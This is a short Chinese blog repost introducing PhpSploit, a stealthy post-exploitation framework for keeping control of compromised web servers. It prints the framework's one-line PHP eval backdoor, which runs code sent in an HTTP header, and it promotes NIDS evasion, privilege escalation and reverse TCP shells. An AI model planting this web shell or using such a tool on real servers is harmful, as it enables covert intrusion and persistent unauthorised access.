今天在freebuf 上看到有一篇介绍PhpSploit的远程控制框架的文章觉得不错,就把文章超过来了。方便以后自己查找。 phpsploit可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作。 概述 该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?> 功能介绍 效率高:
-
提供了超过20款自动化后渗透利用工具;
-
运行命令、浏览文件系统、绕过PHP安全限制;
-
在目标客户端与攻击者端之间实现文件的上传和下载;
-
通过本地文本编辑器编辑远程文件;
-
在目标系统中运行SQL语句;
-
生成反向TCP Shell;
隐蔽性强:
-
专为偏执狂设计;
-
日志分析以及NIDS签名检测机制几乎无法检测到它;
-
绕过安全模式以及常见PHP安全限制;
-
通信信息隐藏在HTTP头中;
-
加载的Payload经过了混淆处理以绕过NIDS;
-
支持http/https/socks4/socks5代理;
使用便捷:
-
跨平台;
-
强大的界面,完整的命令支持;
-
提供了会话保存/加载功能;
-
支持大型Payload,支持多重请求;
-
提供了强大的、高度可配置的设置引擎;
-
每一个设置(例如用户代理)都有多态模式;
-
提供了完整的插件开发API;
支持的平台(攻击者端)
-
GNU/Linux
-
MacOS X
支持的平台(目标用户端)
-
GNU/Linux
-
BSDLike
-
MacOS X
-
WindowsNT
下载地址 https://github.com/nil0x42/phpsploit